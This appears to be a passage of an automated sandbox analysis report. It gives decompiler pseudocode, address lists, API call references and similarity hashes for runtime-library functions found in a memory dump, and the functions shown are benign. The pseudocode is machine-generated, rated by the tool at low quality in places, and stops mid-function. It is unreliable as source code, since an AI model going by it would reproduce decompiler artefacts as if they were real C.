				return E00D8E203(_t68, _v8 ^ _t100);
			}





























              0x00d9a51e
              0x00d9a529
              0x00d9a530
              0x00d9a535
              0x00d9a540
              0x00d9a552
              0x00d9a64a
              0x00d9a64a
              0x00d9a650
              0x00d9a652
              0x00d9a653
              0x00d9a653
              0x00d9a655
              0x00d9a65b
              0x00d9a65b
              0x00d9a65d
              0x00d9a65f
              0x00d9a668
              0x00d9a66b
              0x00d9a677
              0x00d9a67e
              0x00d9a68e
              0x00d9a680
              0x00d9a680
              0x00d9a683
              0x00d9a683
              0x00d9a683
              0x00d9a687
              0x00d9a687
              0x00000000
              0x00d9a687
              0x00d9a66d
              0x00d9a66d
              0x00d9a672
              0x00d9a672
              0x00d9a68a
              0x00d9a68a
              0x00d9a68a
              0x00d9a690
              0x00d9a696
              0x00d9a696
              0x00d9a69c
              0x00d9a69d
              0x00d9a69d
              0x00d9a558
              0x00d9a558
              0x00d9a55a
              0x00d9a55a
              0x00d9a561
              0x00d9a562
              0x00d9a566
              0x00d9a56c
              0x00d9a572
              0x00d9a59a
              0x00d9a59a
              0x00d9a59c
              0x00000000
              0x00000000
              0x00d9a57b
              0x00d9a57f
              0x00d9a591
              0x00d9a591
              0x00d9a593
              0x00000000
              0x00000000
              0x00d9a584
              0x00d9a586
              0x00d9a588
              0x00d9a590
              0x00d9a590
              0x00000000
              0x00d9a590
              0x00000000
              0x00d9a586
              0x00d9a595
              0x00d9a595
              0x00d9a598
              0x00d9a598
              0x00d9a59f
              0x00d9a5b4
              0x00d9a5ba
              0x00d9a5ce
              0x00d9a5d5
              0x00d9a5e4
              0x00d9a5f6
              0x00d9a5fd
              0x00d9a605
              0x00d9a607
              0x00d9a607
              0x00d9a611
              0x00d9a621
              0x00d9a623
              0x00d9a63a
              0x00d9a625
              0x00d9a625
              0x00d9a625
              0x00d9a625
              0x00d9a62a
              0x00000000
              0x00d9a62a
              0x00d9a613
              0x00d9a613
              0x00d9a618
              0x00d9a631
              0x00d9a631
              0x00d9a631
              0x00d9a641
              0x00d9a642
              0x00d9a646
              0x00d9a6b1

              APIs
              • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00D9A543
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Info
              • String ID:
              • API String ID: 1807457897-3916222277
              • Opcode ID: 860a03f708032cfb546b842f41bf4d5b6c3b6c7a338df31fd4d30929a66eded0
              • Instruction ID: ca1946e923ea6af6196769a97b85dcc4fea6112b2b734b158f54606025bccdb2
              • Opcode Fuzzy Hash: 860a03f708032cfb546b842f41bf4d5b6c3b6c7a338df31fd4d30929a66eded0
              • Instruction Fuzzy Hash: 9D4117716047489ADF228E6C8C84BFABBF9EB55308F1804ECE5DA87142D235DA45CFB1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D71D61, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 76COMMON
              Download Yara Rule
              C-Code - Quality: 89%
              			E00D71D61(intOrPtr __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t34;
				intOrPtr _t41;
				intOrPtr _t51;
				void* _t62;
				unsigned int _t64;
				signed int _t66;
				intOrPtr* _t68;
				void* _t70;

				_t62 = __edx;
				_t51 = __ecx;
				E00D8D870(E00DA1173, _t70);
				_t49 = 0;
				 *((intOrPtr*)(_t70 - 0x10)) = _t51;
				 *((intOrPtr*)(_t70 - 0x24)) = 0;
				 *(_t70 - 0x20) = 0;
				 *((intOrPtr*)(_t70 - 0x1c)) = 0;
				 *((intOrPtr*)(_t70 - 0x18)) = 0;
				 *((char*)(_t70 - 0x14)) = 0;
				 *((intOrPtr*)(_t70 - 4)) = 0;
				_t34 = E00D7399D(_t51, _t62, _t70 - 0x24, 0, 0); // executed
				if(_t34 != 0) {
					_t64 =  *(_t70 - 0x20);
					E00D716C0(_t70 - 0x24, _t62, 1);
					_t68 =  *((intOrPtr*)(_t70 + 8));
					 *((char*)( *(_t70 - 0x20) +  *((intOrPtr*)(_t70 - 0x24)) - 1)) = 0;
					_t16 = _t64 + 1; // 0x1
					E00D71837(_t68, _t16);
					_t41 =  *((intOrPtr*)(_t70 - 0x10));
					if( *((intOrPtr*)(_t41 + 0x6cb0)) != 3) {
						if(( *(_t41 + 0x45f4) & 0x00000001) == 0) {
							E00D80FDE( *((intOrPtr*)(_t70 - 0x24)),  *_t68,  *((intOrPtr*)(_t68 + 4)));
						} else {
							_t66 = _t64 >> 1;
							E00D81059( *((intOrPtr*)(_t70 - 0x24)),  *_t68, _t66);
							 *((short*)( *_t68 + _t66 * 2)) = 0;
						}
					} else {
						_push( *((intOrPtr*)(_t68 + 4)));
						_push( *_t68);
						_push( *((intOrPtr*)(_t70 - 0x24)));
						E00D81094();
					}
					E00D71837(_t68, E00D92B33( *_t68));
					_t49 = 1;
				}
				E00D7159C(_t70 - 0x24);
				 *[fs:0x0] =  *((intOrPtr*)(_t70 - 0xc));
				return _t49;
			}











              0x00d71d61
              0x00d71d61
              0x00d71d66
              0x00d71d6f
              0x00d71d73
              0x00d71d76
              0x00d71d79
              0x00d71d7c
              0x00d71d7f
              0x00d71d82
              0x00d71d8a
              0x00d71d90
              0x00d71d97
              0x00d71d9f
              0x00d71da7
              0x00d71db2
              0x00d71db5
              0x00d71db9
              0x00d71dbf
              0x00d71dc4
              0x00d71dce
              0x00d71de6
              0x00d71e07
              0x00d71de8
              0x00d71de8
              0x00d71df0
              0x00d71df9
              0x00d71df9
              0x00d71dd0
              0x00d71dd0
              0x00d71dd3
              0x00d71dd5
              0x00d71dd8
              0x00d71dd8
              0x00d71e17
              0x00d71e1d
              0x00d71e1f
              0x00d71e23
              0x00d71e2e
              0x00d71e38

              APIs
              • __EH_prolog.LIBCMT ref: 00D71D66
                • Part of subcall function 00D7399D: __EH_prolog.LIBCMT ref: 00D739A2
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: H_prolog
              • String ID: CMT
              • API String ID: 3519838083-2756464174
              • Opcode ID: 66ff8a1094a538ec0c78ad73f5ea566db59e7feb9b0feba0d8f3a1ee7e334e22
              • Instruction ID: 58aa5c4860955a0d9aaf5e1b6df7bc436d18db5f2d5ab2011b352e7b3329c29b
              • Opcode Fuzzy Hash: 66ff8a1094a538ec0c78ad73f5ea566db59e7feb9b0feba0d8f3a1ee7e334e22
              • Instruction Fuzzy Hash: B421687A900209AFCB15EF98C9419EEFBF6EF49300F1041AAE849A7251D7325E45CFB0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D99C64, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
              Download Yara Rule
              C-Code - Quality: 37%
              			E00D99C64(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4, int _a8, short* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _t18;
				intOrPtr* _t20;
				int _t22;
				intOrPtr* _t30;
				signed int _t32;

				_t25 = __ecx;
				_push(__ecx);
				_t18 =  *0xdad668; // 0x9e43e7e4
				_v8 = _t18 ^ _t32;
				_push(__esi);
				_t20 = E00D99990(0x16, "LCMapStringEx", 0xda6084, "LCMapStringEx"); // executed
				_t30 = _t20;
				if(_t30 == 0) {
					_t22 = LCMapStringW(E00D99CEC(_t25, _t30, __eflags, _a4, 0), _a8, _a12, _a16, _a20, _a24);
				} else {
					 *0xda2260(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36);
					_t22 =  *_t30();
				}
				return E00D8E203(_t22, _v8 ^ _t32);
			}









              0x00d99c64
              0x00d99c69
              0x00d99c6a
              0x00d99c71
              0x00d99c74
              0x00d99c86
              0x00d99c8b
              0x00d99c92
              0x00d99cd5
              0x00d99c94
              0x00d99cb1
              0x00d99cb7
              0x00d99cb7
              0x00d99ce9

              APIs
              • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,31E85006,00000001,?,000000FF), ref: 00D99CD5
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: String
              • String ID: LCMapStringEx
              • API String ID: 2568140703-3893581201
              • Opcode ID: 52cc0334189ef45104ec4b71bc4f0939272ab81754b489dc7b0d4070f5665fc8
              • Instruction ID: d094c5620c8629410596eaaedb4ba41e0d1c6483e96b34dd8955a22b98a1a663
              • Opcode Fuzzy Hash: 52cc0334189ef45104ec4b71bc4f0939272ab81754b489dc7b0d4070f5665fc8
              • Instruction Fuzzy Hash: 0101133254020CFBCF12AF95CC06EEE7FA6EB09710F094118FE1466160C6328971EBA4
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D99C02, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
              Download Yara Rule
              C-Code - Quality: 37%
              			E00D99C02(void* __ecx, void* __esi, void* __eflags, struct _CRITICAL_SECTION* _a4, long _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _t8;
				intOrPtr* _t10;
				int _t11;
				intOrPtr* _t19;
				signed int _t21;

				_push(__ecx);
				_t8 =  *0xdad668; // 0x9e43e7e4
				_v8 = _t8 ^ _t21;
				_t10 = E00D99990(0x14, "InitializeCriticalSectionEx", 0xda607c, 0xda6084); // executed
				_t19 = _t10;
				if(_t19 == 0) {
					_t11 = InitializeCriticalSectionAndSpinCount(_a4, _a8);
				} else {
					 *0xda2260(_a4, _a8, _a12);
					_t11 =  *_t19();
				}
				return E00D8E203(_t11, _v8 ^ _t21);
			}









              0x00d99c07
              0x00d99c08
              0x00d99c0f
              0x00d99c24
              0x00d99c29
              0x00d99c30
              0x00d99c4d
              0x00d99c32
              0x00d99c3d
              0x00d99c43
              0x00d99c43
              0x00d99c61

              APIs
              • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00D99291), ref: 00D99C4D
              Strings
              • InitializeCriticalSectionEx, xrefs: 00D99C1D
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: CountCriticalInitializeSectionSpin
              • String ID: InitializeCriticalSectionEx
              • API String ID: 2593887523-3084827643
              • Opcode ID: 302e72a3587fac64989e90411e7e957c335c9701948935b66de0ac09125d0130
              • Instruction ID: 6525ad3b5185084d2619d7a62d9f092c4425a0946a52eb01b9f38458ff283c11
              • Opcode Fuzzy Hash: 302e72a3587fac64989e90411e7e957c335c9701948935b66de0ac09125d0130
              • Instruction Fuzzy Hash: E3F0B431A4130CFBCF156F65DC05DAEBFA5EB05720B054018FD0556260CB718A50DBB4
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D99AA7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
              Download Yara Rule
              C-Code - Quality: 37%
              			E00D99AA7(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				signed int _t4;
				intOrPtr* _t6;
				long _t7;
				intOrPtr* _t15;
				signed int _t17;

				_push(__ecx);
				_t4 =  *0xdad668; // 0x9e43e7e4
				_v8 = _t4 ^ _t17;
				_t6 = E00D99990(3, "FlsAlloc", 0xda6040, 0xda6048); // executed
				_t15 = _t6;
				if(_t15 == 0) {
					_t7 = TlsAlloc();
				} else {
					 *0xda2260(_a4);
					_t7 =  *_t15();
				}
				return E00D8E203(_t7, _v8 ^ _t17);
			}









              0x00d99aac
              0x00d99aad
              0x00d99ab4
              0x00d99ac9
              0x00d99ace
              0x00d99ad5
              0x00d99ae6
              0x00d99ad7
              0x00d99adc
              0x00d99ae2
              0x00d99ae2
              0x00d99afa

              APIs
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Alloc
              • String ID: FlsAlloc
              • API String ID: 2773662609-671089009
              • Opcode ID: a7f5d1abeee6bbed1f1670f07c595c4eff0dc2a4871487d43825bda7df2910ba
              • Instruction ID: e8d9a91dfe39bb4d1bf5f1e3134c2966f201087403361a44a0d4c8c6272b217e
              • Opcode Fuzzy Hash: a7f5d1abeee6bbed1f1670f07c595c4eff0dc2a4871487d43825bda7df2910ba
              • Instruction Fuzzy Hash: 21E0E531A45318AB8B20ABAA9C16A6FBBA4DB46710B040059FC1597380CE759E0086F9
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D9281A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
              Download Yara Rule
              C-Code - Quality: 68%
              			E00D9281A(void* __eflags, intOrPtr _a4) {
				intOrPtr* _t2;
				intOrPtr* _t6;

				_t2 = E00D926F9(4, "FlsAlloc", 0xda4394, "FlsAlloc"); // executed
				_t6 = _t2;
				if(_t6 == 0) {
					return TlsAlloc();
				}
				L00D8E2DD();
				return  *_t6(_a4);
			}





              0x00d9282f
              0x00d92834
              0x00d9283b
              0x00d9284e
              0x00d9284e
              0x00d92842
              0x00d9284b

              APIs
              • try_get_function.LIBVCRUNTIME ref: 00D9282F
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: try_get_function
              • String ID: FlsAlloc
              • API String ID: 2742660187-671089009
              • Opcode ID: 0eb41bd710b86dd49d3fd6baba010087b167413ddce6fdf7c29ce5a893b1a4fe
              • Instruction ID: ea4e18c3d6771286ab7f241e77d1c1650ac907e64d430ad49f16efd5394e7ef6
              • Opcode Fuzzy Hash: 0eb41bd710b86dd49d3fd6baba010087b167413ddce6fdf7c29ce5a893b1a4fe
              • Instruction Fuzzy Hash: B9D05E32BC2728BB8E1032D96C12ABABE58CB43BB1F050162FF0C65683D5E5981056F5
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D9A873, Relevance: 3.2, APIs: 2, Instructions: 168COMMON
              Download Yara Rule
              C-Code - Quality: 97%
              			E00D9A873(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				signed int _v32;
				signed int _v36;
				signed int _t48;
				int _t51;
				signed int _t54;
				signed int _t55;
				short _t58;
				signed int _t60;
				signed char _t62;
				signed int _t63;
				signed char* _t71;
				signed char* _t72;
				int _t76;
				signed int _t79;
				signed char* _t80;
				short* _t81;
				int _t85;
				signed char _t86;
				signed int _t87;
				signed int _t89;
				signed int _t90;
				int _t92;
				int _t93;
				intOrPtr _t96;
				signed int _t97;

				_t48 =  *0xdad668; // 0x9e43e7e4
				_v8 = _t48 ^ _t97;
				_t96 = _a8;
				_t76 = E00D9A446(__eflags, _a4);
				if(_t76 != 0) {
					_t92 = 0;
					__eflags = 0;
					_t79 = 0;
					_t51 = 0;
					_v32 = 0;
					while(1) {
						__eflags =  *((intOrPtr*)(_t51 + 0xdad828)) - _t76;
						if( *((intOrPtr*)(_t51 + 0xdad828)) == _t76) {
							break;
						}
						_t79 = _t79 + 1;
						_t51 = _t51 + 0x30;
						_v32 = _t79;
						__eflags = _t51 - 0xf0;
						if(_t51 < 0xf0) {
							continue;
						} else {
							__eflags = _t76 - 0xfde8;
							if(_t76 == 0xfde8) {
								L23:
								_t60 = _t51 | 0xffffffff;
							} else {
								__eflags = _t76 - 0xfde9;
								if(_t76 == 0xfde9) {
									goto L23;
								} else {
									_t51 = IsValidCodePage(_t76 & 0x0000ffff);
									__eflags = _t51;
									if(_t51 == 0) {
										goto L23;
									} else {
										_t51 = GetCPInfo(_t76,  &_v28);
										__eflags = _t51;
										if(_t51 == 0) {
											__eflags =  *0xdd0854 - _t92; // 0x0
											if(__eflags == 0) {
												goto L23;
											} else {
												E00D9A4B9(_t96);
												goto L37;
											}
										} else {
											E00D8E920(_t92, _t96 + 0x18, _t92, 0x101);
											 *(_t96 + 4) = _t76;
											 *(_t96 + 0x21c) = _t92;
											_t76 = 1;
											__eflags = _v28 - 1;
											if(_v28 <= 1) {
												 *(_t96 + 8) = _t92;
											} else {
												__eflags = _v22;
												_t71 =  &_v22;
												if(_v22 != 0) {
													while(1) {
														_t86 = _t71[1];
														__eflags = _t86;
														if(_t86 == 0) {
															goto L16;
														}
														_t89 = _t86 & 0x000000ff;
														_t87 =  *_t71 & 0x000000ff;
														while(1) {
															__eflags = _t87 - _t89;
															if(_t87 > _t89) {
																break;
															}
															 *(_t96 + _t87 + 0x19) =  *(_t96 + _t87 + 0x19) | 0x00000004;
															_t87 = _t87 + 1;
															__eflags = _t87;
														}
														_t71 =  &(_t71[2]);
														__eflags =  *_t71;
														if( *_t71 != 0) {
															continue;
														}
														goto L16;
													}
												}
												L16:
												_t72 = _t96 + 0x1a;
												_t85 = 0xfe;
												do {
													 *_t72 =  *_t72 | 0x00000008;
													_t72 =  &(_t72[1]);
													_t85 = _t85 - 1;
													__eflags = _t85;
												} while (_t85 != 0);
												 *(_t96 + 0x21c) = E00D9A408( *(_t96 + 4));
												 *(_t96 + 8) = _t76;
											}
											_t93 = _t96 + 0xc;
											asm("stosd");
											asm("stosd");
											asm("stosd");
											L36:
											E00D9A51E(_t76, _t89, _t93, _t96, _t96); // executed
											L37:
											_t60 = 0;
											__eflags = 0;
										}
									}
								}
							}
						}
						goto L39;
					}
					E00D8E920(_t92, _t96 + 0x18, _t92, 0x101);
					_t54 = _v32 * 0x30;
					__eflags = _t54;
					_v36 = _t54;
					_t55 = _t54 + 0xdad838;
					_v32 = _t55;
					do {
						__eflags =  *_t55;
						_t80 = _t55;
						if( *_t55 != 0) {
							while(1) {
								_t62 = _t80[1];
								__eflags = _t62;
								if(_t62 == 0) {
									break;
								}
								_t90 =  *_t80 & 0x000000ff;
								_t63 = _t62 & 0x000000ff;
								while(1) {
									__eflags = _t90 - _t63;
									if(_t90 > _t63) {
										break;
									}
									__eflags = _t90 - 0x100;
									if(_t90 < 0x100) {
										_t31 = _t92 + 0xdad820; // 0x8040201
										 *(_t96 + _t90 + 0x19) =  *(_t96 + _t90 + 0x19) |  *_t31;
										_t90 = _t90 + 1;
										__eflags = _t90;
										_t63 = _t80[1] & 0x000000ff;
										continue;
									}
									break;
								}
								_t80 =  &(_t80[2]);
								__eflags =  *_t80;
								if( *_t80 != 0) {
									continue;
								}
								break;
							}
							_t55 = _v32;
						}
						_t92 = _t92 + 1;
						_t55 = _t55 + 8;
						_v32 = _t55;
						__eflags = _t92 - 4;
					} while (_t92 < 4);
					 *(_t96 + 4) = _t76;
					 *(_t96 + 8) = 1;
					 *(_t96 + 0x21c) = E00D9A408(_t76);
					_t81 = _t96 + 0xc;
					_t89 = _v36 + 0xdad82c;
					_t93 = 6;
					do {
						_t58 =  *_t89;
						_t89 = _t89 + 2;
						 *_t81 = _t58;
						_t81 = _t81 + 2;
						_t93 = _t93 - 1;
						__eflags = _t93;
					} while (_t93 != 0);
					goto L36;
				} else {
					E00D9A4B9(_t96);
					_t60 = 0;
				}
				L39:
				return E00D8E203(_t60, _v8 ^ _t97);
			}































              0x00d9a87b
              0x00d9a882
              0x00d9a88a
              0x00d9a892
              0x00d9a897
              0x00d9a8a8
              0x00d9a8a8
              0x00d9a8aa
              0x00d9a8ac
              0x00d9a8ae
              0x00d9a8b1
              0x00d9a8b1
              0x00d9a8b7
              0x00000000
              0x00000000
              0x00d9a8bd
              0x00d9a8be
              0x00d9a8c1
              0x00d9a8c4
              0x00d9a8c9
              0x00000000
              0x00d9a8cb
              0x00d9a8cb
              0x00d9a8d1
              0x00d9a99f
              0x00d9a99f
              0x00d9a8d7
              0x00d9a8d7
              0x00d9a8dd
              0x00000000
              0x00d9a8e3
              0x00d9a8e7
              0x00d9a8ed
              0x00d9a8ef
              0x00000000
              0x00d9a8f5
              0x00d9a8fa
              0x00d9a900
              0x00d9a902
              0x00d9a98c
              0x00d9a992
              0x00000000
              0x00d9a994
              0x00d9a995
              0x00000000
              0x00d9a995
              0x00d9a908
              0x00d9a912
              0x00d9a917
              0x00d9a91f
              0x00d9a925
              0x00d9a926
              0x00d9a929
              0x00d9a97c
              0x00d9a92b
              0x00d9a92b
              0x00d9a92f
              0x00d9a932
              0x00d9a934
              0x00d9a934
              0x00d9a937
              0x00d9a939
              0x00000000
              0x00000000
              0x00d9a93b
              0x00d9a93e
              0x00d9a949
              0x00d9a949
              0x00d9a94b
              0x00000000
              0x00000000
              0x00d9a943
              0x00d9a948
              0x00d9a948
              0x00d9a948
              0x00d9a94d
              0x00d9a950
              0x00d9a953
              0x00000000
              0x00000000
              0x00000000
              0x00d9a953
              0x00d9a934
              0x00d9a955
              0x00d9a955
              0x00d9a958
              0x00d9a95d
              0x00d9a95d
              0x00d9a960
              0x00d9a961
              0x00d9a961
              0x00d9a961
              0x00d9a971
              0x00d9a977
              0x00d9a977
              0x00d9a981
              0x00d9a984
              0x00d9a985
              0x00d9a986
              0x00d9aa4a
              0x00d9aa4b
              0x00d9aa50
              0x00d9aa51
              0x00d9aa51
              0x00d9aa51
              0x00d9a902
              0x00d9a8ef
              0x00d9a8dd
              0x00d9a8d1
              0x00000000
              0x00d9aa53
              0x00d9a9b1
              0x00d9a9b9
              0x00d9a9b9
              0x00d9a9bd
              0x00d9a9c0
              0x00d9a9c6
              0x00d9a9c9
              0x00d9a9c9
              0x00d9a9cc
              0x00d9a9ce
              0x00d9a9d0
              0x00d9a9d0
              0x00d9a9d3
              0x00d9a9d5
              0x00000000
              0x00000000
              0x00d9a9d7
              0x00d9a9da
              0x00d9a9f6
              0x00d9a9f6
              0x00d9a9f8
              0x00000000
              0x00000000
              0x00d9a9df
              0x00d9a9e5
              0x00d9a9e7
              0x00d9a9ed
              0x00d9a9f1
              0x00d9a9f1
              0x00d9a9f2
              0x00000000
              0x00d9a9f2
              0x00000000
              0x00d9a9e5
              0x00d9a9fa
              0x00d9a9fd
              0x00d9aa00
              0x00000000
              0x00000000
              0x00000000
              0x00d9aa00
              0x00d9aa02
              0x00d9aa02
              0x00d9aa05
              0x00d9aa06
              0x00d9aa09
              0x00d9aa0c
              0x00d9aa0c
              0x00d9aa12
              0x00d9aa15
              0x00d9aa24
              0x00d9aa2d
              0x00d9aa32
              0x00d9aa38
              0x00d9aa39
              0x00d9aa39
              0x00d9aa3c
              0x00d9aa3f
              0x00d9aa42
              0x00d9aa45
              0x00d9aa45
              0x00d9aa45
              0x00000000
              0x00d9a899
              0x00d9a89a
              0x00d9a8a0
              0x00d9a8a0
              0x00d9aa54
              0x00d9aa63

              APIs
                • Part of subcall function 00D9A446: GetOEMCP.KERNEL32(00000000,?,?,00D9A6CF,?), ref: 00D9A471
              • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00D9A714,?,00000000), ref: 00D9A8E7
              • GetCPInfo.KERNEL32(00000000,00D9A714,?,?,?,00D9A714,?,00000000), ref: 00D9A8FA
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: CodeInfoPageValid
              • String ID:
              • API String ID: 546120528-0
              • Opcode ID: 789518264c5cadfc1867531eca87d327277d8716521763401b98ab392288714f
              • Instruction ID: 73b0d61b201dd6729c76869cb18906bdb66e84dd56b349000c78e5a2df6acbc5
              • Opcode Fuzzy Hash: 789518264c5cadfc1867531eca87d327277d8716521763401b98ab392288714f
              • Instruction Fuzzy Hash: 83512372A002456FDF209F7DC8416BABBE5EF42310F19806ED0968B252E7799941CFF2
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D71382, Relevance: 3.1, APIs: 2, Instructions: 96COMMON
              Download Yara Rule
              C-Code - Quality: 98%
              			E00D71382(intOrPtr* __ecx, void* __edx, void* __edi, void* __eflags) {
				void* __esi;
				void* _t56;
				signed int _t62;
				signed int _t63;
				char _t64;
				intOrPtr _t74;
				intOrPtr* _t78;
				void* _t86;
				void* _t87;
				intOrPtr* _t89;
				void* _t91;
				void* _t96;

				_t96 = __eflags;
				_t87 = __edi;
				_t86 = __edx;
				_t78 = __ecx;
				E00D8D870(_t56, _t91);
				_push(_t78);
				_t89 = _t78;
				 *((intOrPtr*)(_t91 - 0x10)) = _t89;
				E00D7943C(_t78);
				 *_t89 = 0xda22e8;
				 *((intOrPtr*)(_t91 - 4)) = 0;
				E00D75E99(_t89 + 0x1024, _t86, _t96);
				 *((char*)(_t91 - 4)) = 1;
				E00D7C4CA(_t89 + 0x20e8, _t86, _t96);
				 *((intOrPtr*)(_t89 + 0x21d0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d4)) = 0;
				E00D7151B();
				_t62 = E00D7151B();
				 *((char*)(_t91 - 4)) = 4;
				_t63 = _t62 & 0xffffff00 |  *((intOrPtr*)(_t91 + 8)) == 0x00000000;
				 *((intOrPtr*)(_t89 + 0x21bc)) = 0;
				 *(_t89 + 0x21b8) = _t63;
				_t98 = _t63;
				if(_t63 == 0) {
					_t64 =  *((intOrPtr*)(_t91 + 8));
				} else {
					_t74 = E00D8D82C(_t86, _t89, _t98, 0x82e8);
					 *((intOrPtr*)(_t91 + 8)) = _t74;
					 *((char*)(_t91 - 4)) = 5;
					if(_t74 == 0) {
						_t64 = 0;
					} else {
						_t64 = E00D7AD1B(_t74); // executed
					}
				}
				 *((intOrPtr*)(_t89 + 0x21bc)) = _t64;
				 *(_t89 + 0x21c0) =  *(_t89 + 0x21c0) | 0xffffffff;
				 *(_t89 + 0x21c4) =  *(_t89 + 0x21c4) | 0xffffffff;
				 *(_t89 + 0x21c8) =  *(_t89 + 0x21c8) | 0xffffffff;
				 *((char*)(_t89 + 0x1d)) =  *((intOrPtr*)(_t64 + 0x6199));
				 *((intOrPtr*)(_t89 + 0x6cb0)) = 2;
				 *((intOrPtr*)(_t89 + 0x6cb4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cb8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cc0)) = 0;
